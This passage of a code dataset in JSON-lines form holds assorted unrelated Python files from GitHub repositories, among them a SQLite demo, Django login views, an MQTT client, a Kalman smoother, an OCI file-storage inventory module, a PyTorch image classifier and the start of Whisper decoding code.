con.cursor()\n cursorObj.execute(\n \"CREATE TABLE LoadLog(\"\n \"id_JournalPersonnelNumber int PRIMARY KEY,\"\n \"id_SubFaculties int,\"\n \"NameSubject text,\"\n \"NumberOfHours int,\"\n \"NumberOfGroups int)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO LoadLog \"\n \"VALUES(1,2,'Интерпретируемые языки программирования',4,4)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO LoadLog \"\n \"VALUES(2,1,'Информационная безопасность',2,4)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO LoadLog \"\n \"VALUES(3,3,'Управление информацией',6,4)\"\n )\n con.commit()\n\ndef select(con):\n cursorObj = con.cursor()\n cursorObj.execute(\"SELECT name FROM sqlite_master WHERE type='table'\")\n table = cursorObj.fetchall()\n\n tablesList = []\n for tab in table:\n tablesList.append(tab[0])\n\n for listItem in tablesList:\n print(f\"Вывод содержимого таблицы {listItem}\")\n cursorObj.execute(f'SELECT * from {listItem}')\n [print(row) for row in cursorObj.fetchall()]\n\n\n#con = sql_connection()\n#sql_subfaculties(con)\n#sql_lecturer(con)\n#sql_subject(con)\n#sql_lesson(con)\n#sql_loadlog(con)\n\n#delete,update","repo_name":"BaevaDiana/CGI","sub_path":"DB.py","file_name":"DB.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28215066024","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login as lin, logout as lout\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render\n\nfrom .forms import ConfirmStaffRegistrationForm, LoginForm, StaffRegistrationForm\n\n\ndef login(request):\n template_name = 'accounts/login.html'\n form = LoginForm\n\n if request.method == 'POST':\n form = form(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n if user.is_active:\n lin(request, user)\n messages.success(request, f'Successfully logged in as {user.username}', 'alert-success')\n return redirect('product:index')\n else:\n messages.success(request, 'Your account is inactive. Please contact your system administrator.')\n else:\n messages.error(request, 'Incorrect username or password. Please try again.', 'alert-danger')\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n else:\n messages.error(request, 'The form contains some errors. Please try again.' 'alert-danger')\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n else:\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n\n\n# under construction\n@login_required()\ndef register_staff(request):\n template_name = 'accounts/register_staff.html'\n form = StaffRegistrationForm\n\n if request.method == 'POST':\n form = form(data=request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n else:\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n\n\n# under construction\n@login_required()\ndef confirm_staff_registration(request):\n template_name = 'accounts/confirm_staff_registration.html'\n\n\n@login_required(redirect_field_name=None)\ndef logout(request):\n lout(request)\n messages.success(request, 'Successfully logged out.')\n return redirect('accounts:login')\n","repo_name":"JKAkabo/ngeo","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14691994962","text":"\r\n#installing packages\r\nimport sys \r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport json\r\n\r\n\r\n#Collecting the page\r\npage = requests.get('https://freedomarchives.org/La_Lucha_Continua/Martin_Luther_King.html')\r\n#print(page)\r\nsoup = BeautifulSoup(page.text, 'html.parser')\r\n\r\n\r\ntext = str(soup.find_all('strong'))\r\ntext = text.replace(\"\",\"\")\r\ntext = text.replace(\"\",\"\")\r\n\r\nmy_dict = {\r\n \"person\" : \"Martin Luther King Jr\",\r\n \"message\" : text\r\n}\r\n#print(my_dict)\r\n\r\nd = json.dumps(my_dict)\r\n#print(d)\r\nsys.exit(d)\r\n\r\n","repo_name":"rene415/MuARals","sub_path":"muARals.py","file_name":"muARals.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72168240419","text":"from fastapi import FastAPI, Form, Request\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom api import apiRouter\nfrom models import *\nfrom fastapi import status\n\n\napp = FastAPI(\n title=\"Check Similarity API\",\n description=\"Measure the similarity between the two texts.\",\n debug=True\n)\n\napp.include_router(apiRouter)\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\", include_in_schema=False)\nasync def index(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n@app.post(\"/compare\", include_in_schema=False)\nasync def compare(\n request: Request,\n text1: str = Form(...),\n text2: str = Form(...),\n similarity: SimilarityMethod = Form(...),\n vectorizing: VectorizingMethod = Form(...)\n):\n input = Input(text1=text1, text2=text2,\n similarity=similarity, vectorizing=vectorizing)\n\n try:\n result = input.compare()\n except:\n return RedirectResponse(\"/?error=true\", status_code=status.HTTP_302_FOUND)\n\n return templates.TemplateResponse(\"result.html\", {\"request\": request, \"result\": result})\n","repo_name":"binaenaleyh/checksimilarity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"71296778018","text":"x, y = list(map(int, input().split()))\n\n#takes in input\narr = []\nfor i in range (x):\n arr.append(input())\n\n#finds the empty columns between moves\ncount = 1\nfor j in range (y):\n line = [arr[i][j] for i in range(x) if arr[i][j] != \"_\"]\n if (len(line) == 0):\n count += 1\n\nprint (count)\n","repo_name":"lullebulle1/Kattis","sub_path":"EpigDanceOff/Python Solution.py","file_name":"Python Solution.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7587702491","text":"from number_to_func import NumberToFunc;\nimport os;\n\ndef ClearConsole():\n os.system('cls' if os.name in ('nt', 'dos') else 'clear');\n\n\ndef HienThiDanhSachChucNang():\n print(\"Nhap vao lua chon cua ban:\");\n print(\"0: Thoat chuong trinh\");\n print(\"1: Them Todo moi\");\n print(\"2: Xoa Todo o vi tri la\");\n print(\"3: Cap nhat Todo o vi tri\");\n print(\"4: Hoan thanh Todo o vi tri\");\n print(\"5: In toan bo Todo dang co\");\n print(\"6: In toan bo Todo da hoan thanh\");\n print(\"7: In toan bo Todo chua hoan thanh\");\n\nwhile(True):\n ClearConsole();\n HienThiDanhSachChucNang();\n # Nhap lua chon\n try:\n luaChon = int(input(\"Lua chon cua ban: \"));\n if luaChon >= 0 and luaChon <= 7:\n luaChonFunc = NumberToFunc(luaChon);\n if luaChonFunc is not None:\n luaChonFunc();\n else:\n break;\n else:\n print(\"Lua chon chuc nang khong dung\");\n input();\n continue\n except ValueError:\n print(\"Lua chon chuc nang khong dung\");\n input();\n continue\n\n\nprint(\"Todo Console da thoat\");","repo_name":"namhnz/todo-console-python","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"27937883493","text":"class Solution:\n def searchMatrix(self, matrix: [[int]], target: int) -> bool:\n \"\"\"\n 核心思想还是二分法查找,二维数组转化成一维数组,难点在于mid在一维数组的index转化成二维数组的index\n row: mid // col\n column: mid % col\n :param matrix:\n :param target:\n :return:\n \"\"\"\n left = 0\n right = len(matrix) * len(matrix[0]) - 1\n m = len(matrix)\n n = len(matrix[0])\n\n while left <= right:\n mid = left + (right - left) // 2\n new_mid_row = mid // n\n new_mid_column = mid % n\n\n if matrix[new_mid_row][new_mid_column] == target:\n return True\n\n if matrix[new_mid_row][new_mid_column] < target:\n left = mid + 1\n else:\n right = mid - 1\n\n return False","repo_name":"jsheng0901/leetcode","sub_path":"Two pointers/74.py","file_name":"74.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36618696282","text":"n = int(input())\r\nnums = list(map(int, input().split()))\r\nnums = sorted(nums)\r\n\r\nmax_diff = int((nums[-1] - nums[0])/2)\r\n\r\nmax_count = -1\r\n\r\nfor center in range(nums[0]+1, nums[-1]):\r\n count = 0\r\n\r\n for k in range(1, max_diff+1):\r\n if (center-k) in nums and (center+k) in nums:\r\n count += 1\r\n \r\n max_count = max(max_count, count)\r\n\r\nprint(max_count)","repo_name":"jisoo920/codetree-TILs","sub_path":"231213/등차수열/arithmetic-sequence.py","file_name":"arithmetic-sequence.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40680631338","text":"respuesta = input(\"Coloca una frase y una letra, para contar el numero de veces que aparece: \\n\"+\n \"Formato: FRASE - LETRA\\n\")\nc = 0\nfrase = respuesta.split(\" - \")[0]\nletra = respuesta.split(\" - \")[1].strip() \nc = 0\nfor i in frase:\n if(i == letra):\n c += 1\n \nprint(\"Frase: \" + frase + \", Numero de repeticiones: \" + f\"{c}\")\n\n#apariciones = frase.count(letra)","repo_name":"JonnyJaccob/MultiParadigma","sub_path":"Unidad1/Practicas1Equipos/PracticaE4Bucles.py","file_name":"PracticaE4Bucles.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36876694179","text":"\"\"\" specific mqtt client \"\"\"\nfrom mqttc_configurator import mqttc_configurator\n\n\nTOPIC_DEVELOPMENT = 'development/#'\nTOPIC_RESEARCH = 'research/#'\n\ndef on_message_development(client, userdata, msg):\n \"\"\" handle message on topic develop \"\"\"\n print(\"processing development\")\n\ndef on_message_research(client, userdata, msg):\n \"\"\" handle message on topic research \"\"\"\n print(\"processing research\")\n\ndef loop():\n \"\"\" perform the loop \"\"\"\n print('loop')\n\ndef setup():\n \"\"\" configure this mqtt client \"\"\"\n config = mqttc_configurator(\n client_id='mqttc2',\n subscribe_to=[(TOPIC_DEVELOPMENT, 1), (TOPIC_RESEARCH, 2)],\n loop_delay=60.0\n )\n\n client = next(config)\n client.message_callback_add(TOPIC_DEVELOPMENT, on_message_development)\n client.message_callback_add(TOPIC_RESEARCH, on_message_research)\n config.send(loop)\n # config.send(None)\n\nsetup()\n","repo_name":"akkerman/docker-experiments","sub_path":"mqtt-client/client/mqttc2.py","file_name":"mqttc2.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22965480234","text":"# Imports here\r\nimport time\r\nimport torch\r\nfrom torch import nn, optim\r\nimport helper\r\nfrom torchvision import datasets, transforms\r\nimport numpy as np\r\nimport pandas as pd\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nimport ast\r\nfrom PIL import Image\r\nimport torchvision.transforms as transforms\r\nfrom torch.autograd import Variable\r\nimport torchvision.models as models\r\nfrom torch import __version__\r\nfrom get_input_args import get_input_args\r\n\r\n# --------------------------------------------------------\r\n# args input\r\nargs = get_input_args()\r\ndir = args.dir\r\narch = args.arch\r\nprocess = args.process\r\nlearn_rate = float(args.learn_rate)\r\nlayers = int(args.layers)\r\nepochs = int(args.epochs)\r\ngpu = args.gpu\r\n# --------------------------------------------------------\r\n# Models\r\nresnet18 = models.resnet18()\r\nalexnet = models.alexnet()\r\nvgg16 = models.vgg16()\r\n\r\n# Models dict\r\nmodels = {'resnet': resnet18, 'alexnet': alexnet, 'vgg': vgg16}\r\n\r\n# apply model to input\r\nmodel = models[arch]\r\ncriterion = nn.CrossEntropyLoss()\r\noptimizer = optim.SGD(model.parameters(), lr=learn_rate)\r\n# --------------------------------------------------------\r\n\r\ndef view_class(probes, names):\r\n ''' Function for viewing an image and it's predicted classes.\r\n '''\r\n probes = probes.cpu().data.numpy().squeeze()\r\n names['probes'] = probes\r\n highest = names.nlargest(5, ['probes'])[['probes','flower_name']]\r\n names = names.sort_values(by=['probes'])\r\n \r\n x = highest['probes']\r\n y = highest['flower_name']\r\n\r\n plt.figure(figsize=(15,5));\r\n plt.barh(y=y, width=x*100);\r\n plt.yticks(size=14);\r\n\r\n return names, highest\r\n\r\ndef imshow(image, ax=None, title=None):\r\n \"\"\"Imshow for Tensor.\"\"\"\r\n \r\n # PyTorch tensors assume the color channel is the first dimension\r\n # but matplotlib assumes is the third dimension\r\n image = image.permute(2, 3, 1, 0).squeeze(3);\r\n \r\n # Undo preprocessing\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n image = image*std + mean\r\n \r\n # Image needs to be clipped between 0 and 1 or it looks like noise when displayed\r\n image = np.clip(image, 0, 1);\r\n \r\n plt.imshow(image);\r\n\r\n\r\ndef process_image(model, image_path):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array\r\n '''\r\n # TODO: Process a PIL image for use in a PyTorch model\r\n # load the image\r\n image_PIL = Image.open(image_path) if isinstance(image_path, str) else image_path\r\n\r\n # define transforms\r\n transform = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n \r\n # preprocess the image\r\n image_tensor = transform(image_PIL)\r\n \r\n # resize the tensor (add dimension for batch)\r\n image_tensor.unsqueeze_(0)\r\n \r\n # address tensor as output not wrapper\r\n image_tensor.requires_grad_(False)\r\n\r\n # apply model to input\r\n model = model\r\n\r\n # puts model in evaluation mode\r\n # instead of (default)training mode\r\n model = model.eval()\r\n\r\n output = model(image_tensor)\r\n\r\n # return index corresponding to predicted class\r\n pred_idx = output.data.numpy().argmax()\r\n \r\n return image_tensor\r\n\r\n\r\ndef predict(model, image_path, names):\r\n # model.eval() is a kind of switch for some specific\r\n # layers/parts of the model that behave differently \r\n # during training and inference (evaluating) time.\r\n \r\n model.eval()\r\n \r\n probs = 0\r\n \r\n image = process_image(model, image_path)\r\n imshow(image, ax=None, title=None)\r\n \r\n label = image_path.split('/')[-2]\r\n\r\n # Calculate the class probabilities (softmax) for image\r\n \r\n with torch.no_grad():\r\n output = model.forward(image)\r\n\r\n # Calculating Accuracy\r\n _, preds = torch.max(output.data, 1)\r\n Correct = \"Correct\" if (preds == label) else \"Incorrect\"\r\n\r\n probs = torch.exp(output)\r\n # Plot the image and probabilities\r\n names, highest = view_class(probs, names)\r\n Actual_Name = names.loc[names['Id'] == int(label)+1]['flower_name'].item()\r\n Pred_Name = highest.nlargest(1, 'probes')['flower_name'].item()\r\n Accuracy = np.round(100*highest.nlargest(1, 'probes')['probes'].item(), decimals=2)\r\n\r\n\r\n print(\"# Prediction is: {} \\n# Accuracy: {}%\".format(Correct, Accuracy))\r\n print(\"# Prediction Label: {} \\n# Actual Label: {}\".format(Pred_Name, Actual_Name))\r\n\r\n return probs\r\n\r\n\r\ndef load_model(model, path):\r\n # Checking if GPU is available\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # initialize the model class before loading the model\r\n classifier = model\r\n\r\n # Load the model checkpoint\r\n checkpoint = torch.load(path, map_location=device)\r\n\r\n # Load model weights state\r\n classifier.load_state_dict(checkpoint['Classifier_state'])\r\n\r\n # Load trained optimizer state\r\n optimizer.load_state_dict(checkpoint['Optimizer_state'])\r\n\r\n # Load number of previous epochs\r\n epochs = checkpoint['Epoch']\r\n\r\n # load the criterion\r\n criterion = checkpoint['Loss_Function']\r\n\r\n return classifier, optimizer, epochs, criterion\r\n\r\n\r\n\r\n\r\n","repo_name":"KarimElshetihy/Custom-Dog-Breed-Classifier-using-PyTorch","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"46977240811","text":"import numpy as np\n\ndef kalman_smooth(obs,eps,params):\n\n (M,Q,R) = obs\n\n x = np.zeros(len(M))\n x_k_ = np.zeros(len(M))\n x_k = np.zeros(len(M))\n sig_k_ = np.zeros(len(M))\n sig_k = np.zeros(len(M))\n\n\n gamma = params[0]\n phi = params[1]\n sigv = params[2]\n delta = params[3]\n h = params[4]\n sigg = params[5]\n mu = params[6]\n eta = params[7]\n psi = params[8]\n g = params[9]\n c = params[10]\n Del = params[11]\n J = params[12]\n\n for i in range(len(x)):\n # update one step estimates\n x_k_[i] = gamma + phi* x_k[i-1]\n sig_k_[i] = (phi**2)*sig_k[i-1] + sigv\n\n # update gain\n C_k = sig_k_[i]/((h**2)*sig_k_[i] + sigg)\n\n # update posterior mode\n q = Q[i]\n m = M[i]\n r = R[i,:]\n\n diff = eps + 1\n x_k[i] = x_k_[i]\n while(diff > eps):\n\n p_k = np.exp(mu + eta * x_k[i])/ \\\n (1+np.exp(mu + eta * x_k[i]))\n\n lam_k = np.zeros_like(r)\n lam_k[0] = np.exp(psi + g*x_k[i])\n for S in range(1,len(c)):\n lam_k[S] = np.exp(psi + g*x_k[i] + \\\n np.dot(c[:S],r[:S]))\n for j in range(len(c),len(lam_k)):\n lam_k[j] = np.exp(psi + g*x_k[i] + \\\n np.dot(c,r[j-len(c):j]))\n\n\n rho = -x_k[i] + x_k_[i] + \\\n C_k*(h*(q - delta - h*x_k_[i]) + \\\n eta * sigg * (m - p_k)) + \\\n C_k * sigg * g * np.sum(r-lam_k*Del)\n\n d_rho = -1 - C_k*sigg*((eta**2)*p_k*(1-p_k) + \\\n (g**2)*np.sum(lam_k)*Del)\n\n x_k[i] = x_k[i] - rho/d_rho\n diff = np.abs(rho/d_rho)\n\n x[i] = x_k[i]\n\n p_k = np.exp(mu + eta * x_k[i])/ \\\n (1+np.exp(mu + eta * x_k[i]))\n\n lam_k = np.zeros_like(r)\n lam_k[0] = np.exp(psi + g*x_k[i])\n for S in range(1,len(c)):\n lam_k[S] = np.exp(psi + g*x_k[i] + \\\n np.dot(c[:S],r[:S]))\n for j in range(len(c),len(lam_k)):\n lam_k[j] = np.exp(psi + g*x_k[i] + \\\n np.dot(c,r[j-len(c):j]))\n\n sig_k[i] = 1/(1/sig_k_[i] + (h**2)/sigg + (eta**2)*p_k*(1-p_k) + (g**2)*np.sum(lam_k)*Del)\n\n for i in reversed(range(len(x)-1)):\n A_k = phi*(sig_k[i]/sig_k_[i+1])\n x[i] = x_k[i] + A_k*(x[i+1]-x_k_[i+1])\n\n return x\n","repo_name":"gabeschamberg/nonmarkov-timeseries-estimation","sub_path":"python/ssml_kalman.py","file_name":"ssml_kalman.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"10175525616","text":"################################################################\n# zopyx.smartprintng.plone\n# (C) 2011, ZOPYX Limited & Co. KG, D-72070 Tuebingen, Germany\n################################################################\n\n\"\"\" HTML transformation classes (based on lxml.html) \"\"\"\n\nimport os\nimport re\nimport urllib2\nimport cgi\nimport tempfile\nimport inspect\nimport uuid\nimport time\nimport lxml.html\n\nfrom lxml.cssselect import CSSSelector\nfrom Products.CMFCore.utils import getToolByName\n\n_marker = object()\nTRANSFORMATIONS = dict()\n\ndef registerTransformation(method):\n \"\"\" Decorator to register a method as a transformation\"\"\"\n name = method.__name__\n TRANSFORMATIONS[name] = method\n\ndef availableTransformations():\n return TRANSFORMATIONS.keys()\n\ndef hasTransformations(transformations):\n available_transformations = availableTransformations()\n for t in transformations:\n if not t in available_transformations:\n return False\n return True\n\nclass Transformer(object):\n\n def __init__(self, transformation_names, context=None, destdir=None):\n self.transformation_names = transformation_names\n self.context = context\n self.destdir = destdir\n\n def __call__(self, html, input_encoding=None, output_encoding=unicode, return_body=False):\n\n if not isinstance(html, unicode):\n if not input_encoding:\n raise TypeError('Input data must be unicode')\n html = unicode(html, input_encoding)\n\n html = html.strip()\n if not html:\n return u''\n\n root = lxml.html.fromstring(html)\n\n for name in self.transformation_names:\n method = TRANSFORMATIONS.get(name)\n params = dict(context=self.context,\n request=getattr(self.context, 'REQUEST', None),\n destdir=self.destdir,\n )\n if method is None:\n raise ValueError('No transformation \"%s\" registered' % name)\n\n ts = time.time()\n argspec = inspect.getargspec(method)\n if isinstance(argspec, tuple):\n args = argspec[0] # Python 2.4\n else:\n args = argspec.args\n if 'params' in args:\n method(root, params)\n else:\n method(root)\n\n if return_body:\n body = root.xpath('//body')[0]\n html_new = body.text + u''.join([lxml.html.tostring(b, encoding=output_encoding) for b in body])\n\n else:\n html_new = lxml.html.tostring(root, encoding=output_encoding)\n if html_new.startswith('
    ') and html_new.endswith('
    '):\n html_new = html_new[5:-6].strip()\n\n return html_new.strip()\n\ndef xpath_query(node_names, relative=True):\n if not isinstance(node_names, (list, tuple)):\n raise TypeError('\"node_names\" must be a list or tuple (not %s)' % type(node_names))\n if relative:\n return './/*[%s]' % ' or '.join(['name()=\"%s\"' % name for name in node_names])\n else:\n return '//*[%s]' % ' or '.join(['name()=\"%s\"' % name for name in node_names])\n\nALL_HEADINGS = ('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7', 'h8', 'h9', 'h10')\nUUID4TAGS = ALL_HEADINGS + ('img', 'table', 'li', 'dt', 'ul', 'ol', 'dl')\n@registerTransformation\ndef addUUIDs(root, params, tags=UUID4TAGS):\n \"\"\" Add a unique/random UUID to all (specified) tags \"\"\"\n\n root.attrib['documentroot'] = '1'\n root.attrib['documentuid'] = params['context'].UID()\n\n for node in root.xpath(xpath_query(tags, relative=False)):\n node_id = node.get('id', _marker)\n if node_id is _marker:\n node.attrib['id'] = str(uuid.uuid4())\n","repo_name":"veit/vs.contentpopup","sub_path":"vs/contentpopup/subscribers/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"131122156","text":"#\n# modules/db_fss.py\n#\n\nimport os\nimport sqlite3\n\nclass DbFss():\n def __init__(self, db_dir):\n fss_db_table = [\n '''\n CREATE TABLE IF NOT EXISTS fss_filesystem (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n region TEXT NOT NULL,\n compartment_id TEXT NOT NULL,\n name TEXT NOT NULL,\n ad TEXT NOT NULL, \n ocid TEXT NOT NULL UNIQUE ON CONFLICT IGNORE,\n owner TEXT NOT NULL,\n created_on TEXT NOT NULL\n );\n ''',\n '''\n CREATE TABLE IF NOT EXISTS fss_snapshot (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n region TEXT NOT NULL,\n ocid TEXT NOT NULL UNIQUE ON CONFLICT IGNORE,\n name TEXT NOT NULL, \n file_system_id TEXT NOT NULL,\n provenance_id TEXT NOT NULL,\n owner TEXT NOT NULL,\n created_on TEXT NOT NULL \n );\n ''', \n '''\n CREATE TABLE IF NOT EXISTS fss_mounttarget (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n region TEXT NOT NULL,\n compartment_id TEXT NOT NULL, \n name TEXT NOT NULL,\n ad TEXT NOT NULL,\n ocid TEXT NOT NULL UNIQUE ON CONFLICT IGNORE,\n subnet_id TEXT NOT NULL,\n owner TEXT NOT NULL,\n created_on TEXT NOT NULL \n );\n '''\n ] \n\n fss_db_file = db_dir + '/fss.db' \n \n if not os.path.isfile(fss_db_file):\n self.__conn = sqlite3.connect(fss_db_file)\n self.__cursor = self.__conn.cursor()\n \n for table in fss_db_table: \n self.__cursor.execute(table)\n else:\n self.__conn = sqlite3.connect(fss_db_file)\n self.__cursor = self.__conn.cursor()\n\n def add_filesystem(self, fss_fs_dict): \n dml = '''\n INSERT INTO fss_filesystem (region, compartment_id, name, ad, ocid, owner, created_on) \n VALUES (\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\");\n ''' % (fss_fs_dict['region'], fss_fs_dict['compartment_id'], fss_fs_dict['name'], \n fss_fs_dict['ad'], fss_fs_dict['ocid'], fss_fs_dict['owner'], fss_fs_dict['created_on'],) \n\n self.__cursor.execute(dml)\n self.__conn.commit()\n\n return self.__cursor.lastrowid\n \n def add_snapshot(self, fss_snp_dict): \n dml = '''\n INSERT INTO fss_snapshot (region, ocid, name, owner, created_on, file_system_id, owner,\n provenance_id) \n VALUES (\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\");\n ''' % (fss_snp_dict['region'], fss_snp_dict['ocid'], fss_snp_dict['name'], fss_snp_dict['owner'],\n fss_snp_dict['created_on'], fss_snp_dict['file_system_id'], fss_snp_dict['owner'],\n fss_snp_dict['provenance_id'],) \n\n self.__cursor.execute(dml)\n self.__conn.commit()\n\n return self.__cursor.lastrowid\n \n def add_mounttarget(self, fss_mt_dict): \n dml = '''\n INSERT INTO fss_mounttarget (region, compartment_id, name, ad, ocid, subnet_id,\n owner, created_on) \n VALUES (\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\");\n ''' % (fss_mt_dict['region'], fss_mt_dict['compartment_id'], fss_mt_dict['name'], \n fss_mt_dict['ad'], fss_mt_dict['ocid'], fss_mt_dict['subnet_id'], fss_mt_dict['owner'],\n fss_mt_dict['created_on'],) \n\n self.__cursor.execute(dml)\n self.__conn.commit()\n\n return self.__cursor.lastrowid\n \n def list_filesystems(self, owner=None):\n if owner is not None:\n dml = ''' \n SELECT id, region, compartment_id, name, ad, ocid, owner, created_on \n FROM fss_filesystem WHERE owner LIKE \"%%%s\";\n ''' % (owner,) \n else:\n dml = '''\n SELECT id, region, compartment_id, name, ad, ocid, owner, created_on \n FROM fss_filesystem;\n '''\n\n self.__cursor.execute(dml)\n filesystems_list = self.__cursor.fetchall()\n\n return filesystems_list\n \n def list_snapshots(self, owner=None):\n if owner is not None:\n dml = ''' \n SELECT id, region, ocid, name, file_system_id, provenance_id, owner, created_on\n FROM fss_snapshot WHERE owner LIKE \"%%%s\";\n ''' % (owner,) \n else:\n dml = '''\n SELECT id, region, ocid, name, file_system_id, provenance_id, owner, created_on\n FROM fss_snapshot;\n '''\n\n self.__cursor.execute(dml)\n snapshots_list = self.__cursor.fetchall()\n\n return snapshots_list\n \n def list_mounttargets(self, owner=None):\n if owner is not None:\n dml = ''' \n SELECT id, region, compartment_id, name, ad, ocid, subnet_id, owner, \n created_on FROM fss_mounttarget WHERE owner LIKE \"%%%s\";\n ''' % (owner,) \n else:\n dml = '''\n SELECT id, region, compartment_id, name, ad, ocid, subnet_id, owner, \n created_on FROM fss_mounttarget;\n '''\n\n self.__cursor.execute(dml)\n mounttargets_list = self.__cursor.fetchall()\n\n return mounttargets_list\n \n def delete_filesystem(self, id):\n dml = '''\n DELETE FROM fss_filesystem WHERE id = %d;\n ''' % (id,)\n \n self.__cursor.execute(dml)\n self.__conn.commit()\n \n def delete_snapshot(self, id):\n dml = '''\n DELETE FROM fss_snapshot WHERE id = %d;\n ''' % (id,)\n \n self.__cursor.execute(dml)\n self.__conn.commit()\n \n def delete_mounttarget(self, id):\n dml = '''\n DELETE FROM fss_mounttarget WHERE id = %d;\n ''' % (id,)\n\n self.__cursor.execute(dml)\n self.__conn.commit()\n \n def close(self):\n self.__conn.close() \n","repo_name":"daniel-armbrust/oci-trashscan","sub_path":"modules/db_fss.py","file_name":"db_fss.py","file_ext":"py","file_size_in_byte":6361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7073697425","text":"\"\"\"https://www.codewars.com/kata/57a429e253ba3381850000fb\"\"\"\ndef bmi(weight, height):\n bmi = weight / height ** 2\n if bmi > 30:\n return 'Obese'\n elif bmi > 25:\n return 'Overweight'\n elif bmi > 18.5:\n return \"Normal\"\n else:\n return 'Underweight'\n","repo_name":"sieczkah/Codewars_KATA","sub_path":"8 kyu/Calculate BMI.py","file_name":"Calculate BMI.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41029069773","text":"n=int(input(\"enter the range of the pattern\"))\nk=0\nfor i in range(1,n+1):\n k=k+1\n for j in range(1,i+1):\n if(j==i or j==n-(i+1)):\n print(k,end=' ')\n else:\n print(\" \",end=' ')\n print()\n","repo_name":"manmay2/PYTHON-PROGRAMMING","sub_path":"PROGRAMS/pattern53.py","file_name":"pattern53.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"24913981861","text":"import copy\nimport numpy as np\n\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Tuple, Iterable, Optional, Sequence, Union, Callable, TYPE_CHECKING\n\nimport torch\nimport torch.nn.functional as F\n\nfrom torch import Tensor\nfrom torch.distributions import Categorical\n\nfrom .audio import CHUNK_LENGTH\nfrom .tokenizer import Tokenizer, get_tokenizer\nfrom .utils import compression_ratio\n\nif TYPE_CHECKING: from .model import Whisper\n\nclass Inference:\n def __init__(self, model:\"Whisper\", initial_token_length:int, enable_cache:bool):\n self.model: \"Whisper\" = model\n self.initial_token_length = initial_token_length\n self.kv_cache = {} if enable_cache else None\n self.hooks = []\n\n def logits(self, tokens:Tensor, audio_features:Tensor, log_tensors:bool=False) -> Tensor:\n if self.kv_cache is not None:\n if not self.kv_cache:\n self.kv_cache, self.hooks = 